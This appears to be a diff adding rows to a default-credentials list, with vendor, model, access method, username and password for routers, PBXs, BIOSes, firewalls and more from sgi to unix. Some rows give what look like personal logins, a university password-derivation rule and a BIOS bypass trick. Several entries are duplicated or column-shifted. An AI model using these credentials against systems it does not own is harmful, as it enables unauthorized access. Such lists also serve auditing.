+sgi,IRIX,,,lp,lp,,ALL, +sgi,all,,,root,,,all, +sharp,AR-201,,http,,sysadm,,, +sharp,AR-280,,Full,,sysadm,,, +sharp,AR-280,,HTTP,,sysadm,Full,, +sharp,AR-336,,HTTP,,sysadm,admin,, +sharp,AR-336,,admin,,sysadm,,, +sharp,AR-407/S402 ,,Multi,,,Admin,, +sharp,AR-M205,,Web,admin,Sharp,full,, +sharp,AR-M257,,WEB Interface,admin,Sharp,,, +sharp,AR-M355N,,,admin,Sharp,Admin,, +sharp,AR-M550,,,admin,Sharp,HTTP,, +sharp,AR507/S507,,HTTP,,sysadm,,, +shiva,AccessPort,,,hello,hello,,, +shiva,AccessPort,,,hello,hello,,Any, +shiva,Any?,,,Guest,blank,,, +shiva,Integrator,,Admin,admin,hello,,, +shiva,Integrator,150/200/500,Multi,admin,hello,Admin,, +shiva,LanRover,,,guest,,,, +shiva,LanRover,,,root,,,, +shiva,ShivaPort,,console,admin,hello,Admin,, +shoretel,Conference Bridge,,,Admin,admin1,,, +shoretel,ShoreTel Call Manager,,,admin,changeme,,, +shoretel,ShoreWare Director,,,admin,changeme,,, +shuttle,PC BIOS,,,,Spacve,,, +shuttle,PC BIOS,,,,Spacve,Admin,, +shuttle,PC BIOS,,Admin,,Spacve,,, +siemens nixdorf,Hicom 100E PBX,,,31994,31994,,, +siemens nixdorf,Hicom 150E PBX,,,31994,31994,,, +siemens nixdorf,PBX,,8818,,uboot,,, +siemens nixdorf,PC BIOS,,,,SKY_FOX,,, +siemens nixdorf,PC BIOS,,Admin,,SKY_FOX,,, +siemens nixdorf,PhoneMail,,,poll,poll,,, +siemens nixdorf,PhoneMail,,,sysadmin,sysadmin,,, +siemens nixdorf,PhoneMail,,,system,system,,, +siemens nixdorf,PhoneMail,,,tech,tech,,, +siemens nixdorf,ROLM PBX,,,admin,pwp,,, +siemens nixdorf,ROLM PBX,,,eng,engineer,,, +siemens nixdorf,ROLM PBX,,,op,operator,,, +siemens nixdorf,ROLM PBX,,,su,super,,, +siemens,5940 T1E1 Router,5940-001 v6.0.180-2,Telnet,superuser,admin,Admin,, +siemens,APACS,,ACM Controller,,gubed,,, +siemens,Gigaset SX541 WLAN dsl,,http://192.168.2.1,,admin,Admin,, +siemens,HiPath 3000,,,31994,31994,,, +siemens,HiPath 3000,,Manager,office,office,,, +siemens,HiPath 3000,,Multi,31994,31994,,, +siemens,Optipoint,,,,123456,,, +siemens,Optipoint,,Multi,,123456,,, +siemens,PC BIOS,,,,SKY_FOX,CMOS,, +siemens,PhoneMail,,,poll,tech,,, +siemens,PhoneMail,,,sysadmin,sysadmin,,, +siemens,PhoneMail,,,tech,tech,,, +siemens,Phonemail,,,tech,field,,, +siemens,Phonemail,,Multi,tech,field,,, +siemens,QUADLOG,,CCM Controller,,gubed,,, +siemens,ROLM PBX,,,admin,pwp,,, +siemens,ROLM PBX,,,eng,engineer,,, +siemens,ROLM PBX,,,op,op,,, +siemens,ROLM PBX,,,op,operator,,, +siemens,ROLM PBX,,,su,super,,, +siemens,SE515,,,admin,,,, +siemens,SE515,,HTTP,admin,,,, +siemens,Siemens Nixdorf 8818 PBX,,,,uboot,,, +siemens,Siemens Nixdorf Hicom 100E PBX,,,31994,31994,,, +siemens,Siemens Nixdorf Hicom 150E PBX,,,31994,31994,,, +siemens,Siemens Nixdorf PC BIOS,,Console,,SKY_FOX,Admin,, +siemens,Siemens Pro C5,,Multi,,,Admin,, +siemens,SpeedStream 4100,,HTTP,admin,hagpolm1,Admin,DSL Modem and Router, +siemens,WinCC,,,WinCCAdmin,2WSXcde.,,, +siemens,WinCC,,,WinCCConnect,2WSXcder,,, +siemens,hipath,,,,,,, +siemens,hipath,,Admin,,,,, +siemens,hipath,,Multi,,,Admin,, +sigma,Sigmacoma IPshare,Sigmacom router v1.0,HTTP,admin,admin,Admin,, +sigmatel,s3+,s3+,,,1221,,can be change, +siips,Trojan,,8974202,Administrator,ganteng,,, +siips,Trojan,,Admin,Administrator,ganteng,,, +siips,Trojan,8974202,Multi,Administrator,ganteng,Admin,, +siips,Trojan,8974202,Multi,Administrator,ganteng,Admin,Thx, +silextechnology,PRICOM (Printserver),,Multi,root,,Admin,for telnet / HTTP, +silicon graphics,IRIX,,,4Dgifts,,,, +silicon graphics,IRIX,,,6.x,,,, +silicon graphics,IRIX,,,Ezsetup,,,, +silicon graphics,IRIX,,,OutOfBox,,,, +silicon graphics,IRIX,,,demos,,,, +silicon graphics,IRIX,,,field,field,,, +silicon graphics,IRIX,,,tour,tour,,, +silicon graphics,IRIX,,,tutor,,,, +silicon graphics,IRIX,,5.x 6.x,guest,,,, +silicon graphics,IRIX,,5.x 6.x,lp,,,, +silicon graphics,IRIX,,Admin,4Dgifts,,,, +silicon graphics,IRIX,,Admin,4Dgifts,4Dgifts,,, +silicon graphics,IRIX,,Admin,Ezsetup,,,, +silicon graphics,IRIX,,Admin,OutOfBox,,,, +silicon graphics,IRIX,,Admin,demos,,,, +silicon graphics,IRIX,,Admin,field,field,,, +silicon graphics,IRIX,,Admin,tour,tour,,, +silicon graphics,IRIX,,Admin,tutor,,,, +silicon graphics,IRIX,,Admin,tutor,tutor,,, +silicon graphics,IRIX,,CLI,guest,,,, +silicon graphics,IRIX,,CLI,lp,,,, +silicongraphics,IRIX,,Multi,4Dgifts,,Admin,, +silicongraphics,IRIX,,Multi,4Dgifts,4Dgifts,Admin,, +silicongraphics,IRIX,,Multi,Ezsetup,,Admin,, +silicongraphics,IRIX,,Multi,OutOfBox,,Admin,, +silicongraphics,IRIX,,Multi,demos,,Admin,, +silicongraphics,IRIX,,Multi,field,field,Admin,, +silicongraphics,IRIX,,Multi,tour,tour,Admin,, +silicongraphics,IRIX,,Multi,tutor,,Admin,, +silicongraphics,IRIX,,Multi,tutor,tutor,Admin,, +silicongraphics,IRIX,5.x 6.x,Multi,guest,,CLI; UID guest,, +silicongraphics,IRIX,5.x 6.x,Multi,lp,,CLI; UID lp,, +sipura,SPA-3000,,prot:,admin,admin,Administration,, +sitara,qosworks,,Console,root,,Admin,, +site interactive,Auction Weaver Lite,,,admin,pass,,, +sitecom,All WiFi routers,,Multi,,sitecom,Admin,, +sitecom,DC-207,,,admin,admin,Admin,, +sitecom,WL-108,,,admin,password,Admin,, +sitecom,WL-109,,,admin,password,Admin,, +sitecom,WL-114v2,,,admin,admin,Admin,, +sitecom,WL-122,,,,sitecom,Admin,, +sitecom,WL-607,,http://192.168.0.1,admin,admin,,, +sitecom,WR-1133,,,,damin,Admin,, +sitecom,wl-108,,192.168.0.1,,,,, +siteinteractive,Auction Weaver Lite,,,admin,pass,Admin,, +smartbridges,airBridge,,admin,admin,public,,, +smartbridges,airBridge,2.x,Multi,admin,public,admin,, +smartswitch,Router 250 ssr2500,,Admin,admin,,,, +smartswitch,Router 250 ssr2500,,v3.0.9,admin,,,, +smartswitch,Router 250 ssr2500,v3.0.9,Multi,admin,,Admin,, +smc,2804WR,,HTTP,,smcadmin,Admin,, +smc,7004FW,,Admin,,,,, +smc,7004FW,,HTTP,,,Admin,, +smc,7004VBR,V.2,http://192.168.2.1.,,smcadmin,Admin,192.168.2.1., +smc,7204BRA,,HTTP,smc,smcadmin,web,, +smc,7204BRA,,Multi,smc,smcadmin,Admin,, +smc,7204bra,,web,smc,smcadmin,,, +smc,7401BRA,1,HTTP,admin,barricade,Admin,, +smc,7401BRA,2,HTTP,smc,smcadmin,Admin,, +smc,7901W/BRA,,,admin,smcadmin,,, +smc,7901W/BRA,,HTTP,admin,smcadmin,,, +smc,7901W/BRA,,Multi,admin,smcadmin,,, +smc,8014,Comcast,,cusadmin,highspeed,Admin,, +smc,Barricade 7004 AWBR,,,admin,,,, +smc,Barricade 7004 AWBR,,Admin,admin,,,, +smc,Barricade 7004ABR,,,,0000,Admin,, +smc,Barricade 7004AWBR,,Multi,admin,,Admin,192.168.123.254 (WiFi AP), +smc,Barricade 7004VBR,V.2,,,smcadmin,Admin,, +smc,Barricade 7004VWBR,,Multi,,,Admin,Connect to 192.168.2.1 or 192.168.2.1:88, +smc,Barricade 7204BRB,,HTTP,admin,smcadmin,Admin,, +smc,Barricade Router,,,Admin,Barricade,,, +smc,Barricade Router,,7004ABR,,0000,,, +smc,Barricade Routers,,,Admin,Barricade,Admin,, +smc,Modem/Router,,HTTP,cusadmin,highspeed,Customer Admin,Comcast Commercial High Speed Modem model number 8013WG, +smc,Modem/Wireless Router,,http://192.168.0.1,cusadmin,password,root,, +smc,Router,,Admin,admin,admin,,, +smc,Router,,All,admin,admin,,, +smc,Router,All,HTTP,admin,admin,Admin,, +smc,Router/Modem,BR7401,Multi,admin,barricade,Admin,, +smc,SMB2804WBR,V2,Multi,Administrator,smcadmin,Admin,, +smc,SMC broadband router,,HTTP,admin,admin,Admin,, +smc,SMC2304 Router,,,,smcadmin,,, +smc,SMC2304WBR-AG,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC2404 Router,,,,smcadmin,,, +smc,SMC2652W,,,default,WLAN_AP,Admin,, +smc,SMC2804 Router,,,,smcadmin,,, +smc,SMC2804WBR,,HTTP,admin,smcadmin,Admin,, +smc,SMC2804WBR,v.1,HTTP,,smcadmin,Admin,, +smc,SMC2804WBRP-G,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC2804WBRP-G,BARRICADE g,192.168.2.1,,,house hold names,, +smc,SMC7004VBR,,http://192.168.2.1,,,Administration,, +smc,SMC7904BRA,,Multi,,smcadmin,Admin,, +smc,SMC7904BRA,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC7904WBRA,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC7908VoWBRA,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC8014,1B,http://192.168.0.1,cusadmin,password,user,Brighthouse CFL, +smc,SMC8014W-G,2A,http://192.168.0.1,cusadmin,password,Admin,This is a Cable Modem / Wireless Router., +smc,SMCBR14UP,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCBR14VPN,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCBR18VPN,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCBR24Q,,http://192.168.2.1,smcadmin,smcadmin,Administration,, +smc,SMCD3G-CCR,,http://10.1.10.1,cusadmin,highspeed,admin,Comcast small business modem, +smc,SMCWBR-14N,,http://192.168.2.1,admin,smcadmin,,, +smc,SMCWBR14-G,,HTTP,,smcadmin,Admin,mentioned password (no passwd) on your webpage is wrong, +smc,SMCWBR14-G,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCWBR14-GM,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCWBR14-N2,,http:192.168.2.1,Admin,smcadmin,Admin,, +smc,SMCWBR14T-G,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCWEBT-G,,http://192.168.2.25,,smcadmin,Administration,, +smc,WiFi Router,All,HTTP,,smcadmin,Admin,model #2804WBRP-G, +smc,Wireless Router 2655W,,Initial Password,None Needed,MiniAP,,, +smc,Wireless Router 2655W,1.4h.9,HTTP,None Needed,MiniAP,Initial Password,, +smc,all models,all versions,cable,,highspeed,user,, +smc,smcwbr14-3gn,,192.168.2.1.,admin,smcadmin,,, +smc,wbr14-3gn,,192.168.2.1.,admin,123465,,, +smith & bentzen,InstantWebMail (IWM),,,username,password,,, +smithbentzen,Instant Web Mail (IWM),,http,username,password,,, +snapgear,Pro, Lite, and SOHO,1.79 +,Multi,root,default,Admin,Before 1.79 no user name req., +snapgear,SnapGear,,,root,default,,, +snapgear,SnapGear,,Multi,root,default,,, +snapgear,firewall,,Multi,root,admin,tcp-ip,, +snapgear,firewall,,tcp-ip,root,admin,,, +snom,320,,http,Administrator,0000,,, +snom,360,,http,Administrator,0000,,, +softwarehouse,CCURE Access Control System,(all),Console,manager,manager,Admin,, +softwarehouse,CCURE Access Control System,,Admin,manager,manager,,, +soho,nbg800,,,admin,1234,,unknown, +solution6,Viztopia Accounts,,Multi,aaa,often blank,Admin,, +sonicwall,ALL,,ALL,admin,password,,, +sonicwall,ALL,,Admin,admin,password,,, +sonicwall,Any Firewall Device,,,admin,password,,, +sonicwall,Firewall,,,admin,password,,, +sonicwall,Firewall,,HTTP,admin,password,root,, +sonicwall,Firewall,,root,admin,password,,, +sonicwall,Most UTM Devices (TZ/PRO/NSA),,http://192.168.168.168:80/,admin,password,,, +sonicwall,SOHO TELE TZ and PRO,,,admin,password,,, +sonicwall,TZ 190,,Https://10.10.10.206,admin,,,, +sonicwall,TZ1000,1.03,,admin,depp,,, +sonicx,SonicAnime,on,Telnet,root,admin,Admin,1.0101E+14, +sony,Network Camera SNC-RZ30,,,admin,admin,,, +sony,Network Camera SNC-RZ30,,HTTP,admin,admin,,, +sonyericsson,T290i,,,,0000,default to reset the phone,, +sonyericsson,T68i,,,,0000,default to reset the phone,, +sonyericsson,sony ericsson xperia,x1,,apex,ccg425,,, +sophiaschweizag,Protector,,HTTPS,admin,Protector,Admin,, +sophiaschweizag,Protector,,SSH,root,root,Admin,, +sorenson,SR-200,,HTTP,,admin,Admin,, +sourcebycircuitcity,In-Store Demo Windows Screen Savers,,,,,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book., +sourcefire,RNA Sensor,,,admin,password,,, +sourcefire,RNA Sensor,,,root,password,,, +sourcefire,RNA Sensor,,http,admin,password,Admin,, +sourcefire,RNA Sensor,,ssh/console,root,password,Admin,, +sovereign hill,InQuery,,,Admin,shs,,, +sovereignhill,InQuery,,,Admin,shs,Admin,, +soyo,PC BIOS,,console,,SY_MB,Admin,, +speco,CCTV Digital Video Recorder,all,web interface,admin,1234,admin operator,, +speco,CCTV Digital Video Recorder,all,web interface,user,4321,viewing user,, +speedstream,5660,,Telnet,,adminttd,Admin,, +speedstream,5667,R4.0.1 ,HTTP,,admin,Admin,, +speedstream,5861 SMT Router,,,admin,admin,,, +speedstream,5861 SMT Router,,Admin,admin,admin,,, +speedstream,5861 SMT Router,,Multi,admin,admin,Admin,, +speedstream,5871 IDSL Router,,,admin,admin,,, +speedstream,5871 IDSL Router,,Admin,admin,admin,,, +speedstream,5871 IDSL Router,,Multi,admin,admin,Admin,, +speedstream,DSL,,,admin,admin,,, +speedstream,DSL,,Admin,admin,admin,,, +speedstream,DSL,,Multi,admin,admin,Admin,, +speedstream,Router 250 ssr250,,,admin,admin,,, +speedstream,Router 250 ssr250,,Admin,admin,admin,,, +speedstream,Router 250 ssr250,,Multi,admin,admin,Admin,, +speedxess,HASE-120,,,,speedxess,,, +speedxess,HASE-120,,Admin,,speedxess,,, +speedxess,HASE-120,,Multi,,speedxess,Admin,, +spider systems,M250,,,,hello,,, +spidersystems,M250,,,,hello,,, +spike,CPE,,,enable,,,, +spike,CPE,,Admin,enable,,,, +spike,CPE,,Console,enable,,Admin,, +sprint,PCS,,Other,self,system,remote voicemail,, +sprint,pcs,,remote voicemail,self,system,,, +ssangyoung,SR2501,,,,2501,,, +stratitec,TimeIPS,,root,root,ahetzip8,,, +stratitec,TimeIPS,All,Console,root,ahetzip8,root,, +sun,,,,root,,,SunOS 4.1.4, +sun,Cobalt,,HTTP,admin,admin,Admin,, +sun,E10000 System Service Processor,,multi,ssp,ssp,Admin,, +sun,JavaServer,,,admin,admin,,, +sun,JavaWebServer,,1.x 2.x,admin,admin,,, +sun,JavaWebServer,,Admin,admin,admin,,, +sun,JavaWebServer,1.x 2.x,AdminSrv,admin,admin,Admin,, +sun,Sun E10000 System Service Processor,,,ssp,ssp,,, +sun,SunOS,,,root,t00lk1t,,, +sun,SunOS,,,root,t00lk1t,Admin,, +sun,SunScreen,,3.1 Lite,admin,admin,,, +sun,SunScreen,3.1 Lite,http (with java) port 3852,admin,admin,Admin,, +sun,many,,,root,sun123,,, +sun,many,,Other,root,sun123,,, +sunmicrosystems,ILOM of X4100,1,HTTP,root,changeme,Admin,, +supermicro,PC BIOS,,,,ksdjfg934t,,, +supermicro,PC BIOS,,Admin,,ksdjfg934t,,, +supermicro,PC BIOS,,Console,,ksdjfg934t,Admin,, +surecom,EP3501/3506,,,admin,surecom,,own os, +surecom,Unknown,,,admin,surecom,,, +surecom,Wireless Broadband Router 11Mbps,,,admin,admin,Administrator,, +suse gmbh,Emailserver,,1.x,root,root,,, +suse gmbh,Emailserver,,Admin,root,root,,, +susegmbh,Emailserver,1.x,Telnet,root,root,Admin,, +sweex,,,,sweex,mysweex,,, +sweex,Broadband Router,,Admin,,blank,,, +sweex,Broadband Router,LB000020,HTTP,,blank,Admin,, +sweex,LW055,,192.168.55.1,sweex,mysweex,admin,, +sweex,MO200,,http://192.168.200.1,sweex,mysweex,,, +swissvoice,IP 10S,,Telnet,target,password,Admin,, +sybase (datev),Adaptive Server Enterprise,,12,sa,sasasa,,, +sybase (datev),Adaptive Server Enterprise,,Admin,sa,sasasa,,, +sybase,Adaptive Server Enterprise,,,12.x,,,, +sybase,Adaptive Server Enterprise,,11.x 12.x,sa,,,, +sybase,Adaptive Server Enterprise,,SA and SSO roles,sa,,,, +sybase,Adaptive Server Enterprise,11.x 12.x,Multi,sa,,SA and SSO roles,, +sybase,EAServer,,HTTP,jagadmin,,Admin,Source : Manufactor documentation, +sybase,Sybase,,8,DBA,SQL,,, +sybase,Sybase,,Admin,DBA,SQL,,, +sybase,Sybase,8.0,Multi,DBA,SQL,Admin,, +sybasedatev,Adaptive Server Enterprise,12.0,Multi,sa,sasasa,Admin,, +symantec,Brightmail Anti-Spam,,,root,brightmail,,, +symantec,NAV CORP / ALL,,,admin,symantec,,, +symantec,NAV CORP / ALL,,Admin,admin,symantec,,, +symantec,NAV CORP / ALL,,HTTP,admin,symantec,Admin,, +symantec,Norton Antivirus Corp Ed.,,Admin,,symantec,,, +symantec,Norton Antivirus Corp Ed.,,all,,symantec,,, +symantec,Norton Antivirus Corp Ed.,all,Multi,,symantec,Admin,, +symantec,VPN-Firewall,,,admin,,,, +symantec,VPN/Firewall Appliance,100/200,http,admin,,Admin,, +symbol,AP-2412,,Multi,,Symbol,Admin,2Mbps FH AccessPoint, +symbol,AP-3020,,Multi,,Symbol,Admin,2Mbps FH AccessPoint, +symbol,AP-4111,,Multi,,Symbol,Admin,11Mbps DS AccessPoint, +symbol,AP-4121,,Multi,,Symbol,Admin,11Mbps DS AccessPoint, +symbol,AP-4131,,Multi,,Symbol,Admin,11Mbps DS AccessPoint, +symbol,AP-5131,,Multi,admin,motorola,https,, +symbol,Spectrum 24 Access Point,,,Symbol,Symbol,,, +symbol,Spectrum 24 Access Point,,HTTP,Symbol,Symbol,,, +symbol,Spectrum 24 Access Point,,http,symbol,Symbol,Admin,, +symbol,Spectrum,series 4100-4121,HTTP,,Symbol,Admin,Access Point Wireless, +symbol,ap5131,,,admin,symbol,,, +syskonnect,6616,,,default.password,,,, +system32,VOS,,Multi,install,secret,Admin,, +tandberg,Border Controller,,Telnet/ssh/http,admin,TANDBERG,Admin,, +tandberg,DLT8000 Autoloader 10x,,Console,,10023,Maintenance,, +tandberg,Gatekeeper,,,admin,TANDBERG,Admin,, +tandberg,TANDBERG,,8000,,TANDBERG,,, +tandberg,Tandberg,8000,Multi,,TANDBERG,Admin,http://www.tandberg.net/collateral/user_manuals/TANDBERG_8000_UserMan.pdf, +tandem,TACL,,Multi,super.super,,Admin,, +tandem,TACL,,Multi,super.super,master,Admin,, +tasman,T1,1000 Series,console,Tasman,Tasmannet,Admin,, +tasman,T1,4000 Series,console,Tasman,Tasmannet,Admin,, +tasman,T1,6000 Series,console,Tasman,Tasmannet,Admin,, +tasman,T1,7000 Series,console,Tasman,Tasmannet,Admin,, +tcomfort,Routers,,HTTP,Administrator,,Admin,, +teamxodus,XeniumOS,2.3,FTP,xbox,xbox,Admin,, +tecom,Titan,,admin,TECOM MASTER,4346,,, +tecom,Titan,2.06,Other,TECOM MASTER,4346,admin,, +tekelec,Eagle STP,,,eagle,eagle,,, +teklogix,Accesspoint,,Multi,Administrator,,Admin,, +telappliant,IP2006 SIP Phone,,http,admin,1234,Admin,, +telcosystems,Edge Link 100,,Console,telco,telco,telco,, +telebit,Netblazer,,,setup,setup,,, +telebit,Netblazer,,,snmp,nopasswd,,, +telebit,netblazer 3.*,,,setup,setup,,, +telebit,netblazer 3.*,,,snmp,nopasswd,,, +telecomnz,Nokia M10,,,Telecom,Telecom,,, +teledat,Routers,,HTTP,admin,1234,Admin,, +telelec,Eagle,,,eagle,eagle,,, +teletronics,WL-CPE-Router,3.05.2,HTTPS,admin,1234,Admin,, +telewell,TW-EA200,,Multi,admin,password,Admin,, +telewell,TW-EA510,,http://192.168.0.254,admin,admin,Admin,, +telindus,1124,,HTTP,,,Admin,, +telindus,SHDSL1421,yes,HTTP,admin,admin,Admin,, +telindus,telindus,2002,Telnet,admin,admin,Admin,, +tellabs,7120,,Multi,root,admin_1,Admin,telnet on port 3083, +tellabs,Titan 5500,,Admin,tellabs,tellabs#1,,, +tellabs,Titan 5500,,FP 6.x,tellabs,tellabs#1,,, +tellabs,Titan 5500,FP 6.x,Multi,tellabs,tellabs#1,Admin,, +teltronic s.a.u.,NEBULA,,,admin,tetra,,, +telus,Telephony Services,,,(created),telus00,,, +telus,Telephony and internet services,,,(username),telus00,User,Initial password if issued in 2000, +telus,Telephony and internet services,,,(username),telus01,User,Initial password if issued in 2001, +telus,Telephony and internet services,,,(username),telus02,User,Initial password if issued in 2002, +telus,Telephony and internet services,,,(username),telus03,User,Initial password if issued in 2003, +telus,Telephony and internet services,,,(username),telus04,User,Initial password if issued in 2004, +telus,Telephony and internet services,,,(username),telus05,User,Initial password if issued in 2005, +telus,Telephony and internet services,,,(username),telus06,User,Initial password if issued in 2006, +telus,Telephony and internet services,,,(username),telus07,User,Initial password if issued in 2007, +telus,Telephony and internet services,,,(username),telus08,User,Initial password if issued in 2008, +telus,Telephony and internet services,,,(username),telus09,User,Initial password if issued in 2009, +telus,Telephony and internet services,,,(username),telus99,User,Initial password if issued in 1999, +teradyne,4TEL,VRS400,DTMF,(last 5 digits of lineman's SSN),(same as user ID),,, +terayon,,,,admin,nms,,6.29, +terayon,TeraLink 1000 Controller,,,admin,password,,, +terayon,TeraLink 1000 Controller,,,user,password,,, +terayon,TeraLink Getaway,,,admin,password,,, +terayon,TeraLink Getaway,,,user,password,,, +terayon,TeraLink,,,admin,password,,, +terayon,Unknown,Comcast-supplied,HTTP,,,diagnostics page,192.168.100.1/diagnostics_page.html, +textportal,TextPortal,,,god1,12345,,, +textportal,TextPortal,,,god2,12345,,, +thomson,,,,D8AA0,12345678,,, +thomson,585,7,192.168.254,,,admin,, +thomson,782i,,http://192.168.1.254,Administrator,CPE.hgw.12,Administrator,Made in Macedonia! BaDxBoY, +thomson,SpeedTouch ,,125.24.231.95,admin,suadmin,,, +thomson,SpeedTouch 530,,http://10.0.0.138,,,Administration,, +thomson,SpeedTouch 536,,http://192.168.1.254,Administrator,,Administration,, +thomson,SpeedTouch 546,,http://192.168.1.254 or http://speedtouch.lan,Administrator,,Administration,, +thomson,SpeedTouch 580,,http://192.168.1.254,Administrator,,Administration,, +thomson,SpeedTouch 585,,http://192.168.1.254,Administrator,,Administration,, +thomson,SpeedTouch 780 WL,SSID.SpeedTouchB,192.168.1.254,,,,, +thomson,SpeedTouch Home,,http://10.0.0.138,admin,admin,Administration,, +thomson,SpeedTouch Pro,,http://10.0.0.138,admin,admin,Administration,, +thomson,SpeedTouch261A3E,SpeedTouch585v6,,administrator,administrator,,, +thomson,SpeedTouch580,,,admin,admin,,, +thomson,SpeedTouch580,4.3.19,HTTP,admin,admin,,, +thomson,TG585,7,192.168.1.254,jalvarez,pc2119,Poniente 29,, +thomson,speed touch,780i wl,,szilizs,keszeg,,, +thomson,speedtouch 585V6,,,Admin,23698,,, +thomson,xp,all versions,http://192.168.1.254/,administrator,,administrator,, +tiara networks,(router???),,1400 6100 6200,,tiara,,, +tiara networks,(router???),,tiaranet,,tiara,,, +tiara,1400,3.x,Console,tiara,tiaranet,Admin,also known as Tasman Networks routers, +tiara,Tiara,,,tiara,tiaranet,,, +tiaranetworks,(router???),1400 6100 6200,Multi,,tiara,tiaranet,, +tim schaab,Mad.Thought,,2.0.1,theman,changeit,,, +timschaab,Mad.Thought,2.0.1,http,theman,changeit,Admin,, +tiny,PC BIOS,,,,Tiny,,, +tiny,PC BIOS,,Console,,Tiny,Admin,, +tinys,PC BIOS,,,,Tiny,,, +tinys,PC BIOS,,,,tiny,,, +tinys,PC BIOS,,Admin,,Tiny,,, +tmc,PC BIOS,,,,BIGO,,, +tmc,PC BIOS,,Admin,,BIGO,,, +tmc,PC BIOS,,Console,,BIGO,Admin,, +toplayer,AppSwitch 2500,,,siteadmin,toplayer,,Any, +toplayer,AppSwitch,,,siteadmin,toplayer,,, +topsec,firewall,,Multi,superman,talent,Admin,, +toshiba 8000,Laptop,,,,,,, +toshiba 8000,Laptop,,Admin,,,,, +toshiba,Most laptops,,console,,,,, +toshiba,PC BIOS,,,,24Banc81,,, +toshiba,PC BIOS,,,,toshy99,,, +toshiba,PC BIOS,,Admin,,24Banc81,,, +toshiba,PC BIOS,,Admin,,Toshiba,,, +toshiba,PC BIOS,,Admin,,toshy99,,, +toshiba,PC BIOS,,Console,,24Banc81,Admin,, +toshiba,PC BIOS,,Console,,Toshiba,Admin,, +toshiba,PC BIOS,,Console,,toshy99,Admin,, +toshiba,PC BIOS,notebooks,Floppy Drive,,4B 45 59 00 00,Admin,If the first 5 bytes of sector 1 of a floppy in drive A are 4B 45 59 00 00 then you can bypass the password by hitting enter when prompted for it (yes, +toshiba,TR-650,,,admin,tr650,,V2.01.00, +toshiba,Toshiba 8000 Laptop,,Multi,,,Admin,, +toshiba,eStudio,All versions,http://,admin,123456,admin,, +tp link,Tp link,,,admin,admin,,, +trend micro,InterScan VirusWall,,,admin,admin,,, +trend micro,Trend Micro,,,admin,admin,,, +trend micro,Viruswall,,Admin,admin,admin,,, +trend micro,Viruswall,,all versions,admin,admin,,, +trendmicro,,7.3,,admin,admin,,, +trendmicro,ISVW (VirusWall),,,admin,admin,,any, +trendmicro,Viruswall,all versions,HTTP on port 1812,admin,admin,Admin,, +trendnet,TEW 432 BRP,,HTTP://192.168.1.1,admin,admin,root,nothing, +trendnet,TEW-432BRB,432BRB,http://192.168.10.1,yarali,konya1,konya1,, +trendnet,TEW-432BRB,432BRB,http://192.168.10.1,yarali,konya1,konya1,konya, +trendnet,TEW-432BRP,,http://192.168.0.1,,,,, +trendnet,TEW-432BRP,TEW-432BRP,,hiua,xurxure,blank,, +trendnet,TEW-450APB,,,admin,admin,,, +trendnet,TEW-452BRP,,http://192.168.1.1,admin,admin,,, +trendnet,TEW-510APB,,http://192.168.1.250,,admin,,, +trendnet,TEW-511BRP,,http://192.168.1.1,,admin,,, +trendnet,TEW-631BRP,,http://192.168.1.1,admin,admin,,, +trendnet,TEW-639GR,,192.168.10.1,admin,payago,,, +trendnet,TEW-652BRP,H/W:V1.OR,HTTP://192.168.10.1,AMIN,ADMIN,ADMIN,, +trendnet,TK1601R,,,,00000000,,, +trendnet,TK1602R,,,,00000000,,, +trendnet,TK801R,,,,00000000,,, +trendnet,TK802R,,,,00000000,,, +trendnet,TPL110AP,,http://10.0.0.3,admin,admin,,, +trendnet,TRENDNET TEW411BRP,,198.162.1.1,,admin,Admin access,, +trendnet,TW100-BRF114,,http://192.168.0.1,,,,, +trendnet,TW100-BRV204,,,,,,, +trendnet,TW100-BRV304,,,,,,, +trendnet,TW100-S4W1CA,,http://192.168.1.1,,,,, +trendnet,tew-432brp,windows7,http://192.168.10,1,,admin,, +trendnet,tw100-s4w1ca,,http://192.168.0.1,admini,admini,admin,nnu stiu parola si numele vechi de la trendnet, +trintech,eAcquirer App/Data Servers,,,t3admin,Trintech,,, +trintech,eAcquirer,,,t3admin,Trintech,,, +triumphadler,DC2116,1.0,http://,admin,0000,admin,, +troy,ExtendNet 100zx,,Multi,admin,extendnet,Admin,dizphunKt, +tsunami,Tsunami-45,,,managers,managers,,, +tsunami,Tsunami-45,1.0,Multi,managers,managers,,, +tvt system,Expresse G5 DS1 Module,,,,enter,,, +tvt system,Expresse G5 DS1 Module,,Admin,,enter,,, +tvt system,Expresse G5,,,craft,,,, +tvt system,Expresse G5,,Admin,craft,,,, +tvtsystem,Expresse G5 DS1 Module,,Multi,,enter,Admin,, +tvtsystem,Expresse G5,,Multi,craft,,Admin,, +type3,Typo3,3.6,,admin,password,Admin,, +typo3,TYPO3,,3.6,admin,password,,, +unex,NexIP Routers,,,,password,,, +unex,NexIP Routers,,HTTP,,password,Admin,, +uniden,UIP1868P,,http://192.168.15.1,admin,UnidEn79!,Configuration,password is case sensitive, +uniden,UIP1869V,,http://192.168.15.1,admin,admin,,, +uniden,UIP300,,HTTP,user,123456,,, +uniden,WNR2004,,http://192.168.1.1,UNIDEN,,,, +unisys,ClearPath MCP,,Multi,ADMINISTRATOR,ADMINISTRATOR,Admin,, +unisys,ClearPath MCP,,Multi,HTTP,HTTP,Web Server Administration,, +unisys,ClearPath MCP,,Multi,NAU,NAU,Privileged,Network Administration Utility, +universityoftennessee,All Employee and Student Services,,, - See Notes,See Notes,Varies with account,Username based on email - eg. if email is smith123@tennessee.edu then NetID (username) is smith123. Def. Password composed of first two letters of birth month in lower case; last two digits of birth; last four digits of UT ID Number; eg. Born Feb 1979 and UT ID Number is 123-45-6789 - default password is fe796789, +unix,Generic,,,adm,,,, +unix,Generic,,,adm,adm,,, +unix,Generic,,,admin,admin,,, +unix,Generic,,,administrator,,,, +unix,Generic,,,administrator,administrator,,, +unix,Generic,,,anon,anon,,, +unix,Generic,,,bbs,,,, +unix,Generic,,,bbs,bbs,,, +unix,Generic,,,bin,sys,,, +unix,Generic,,,checkfs,checkfs,,, 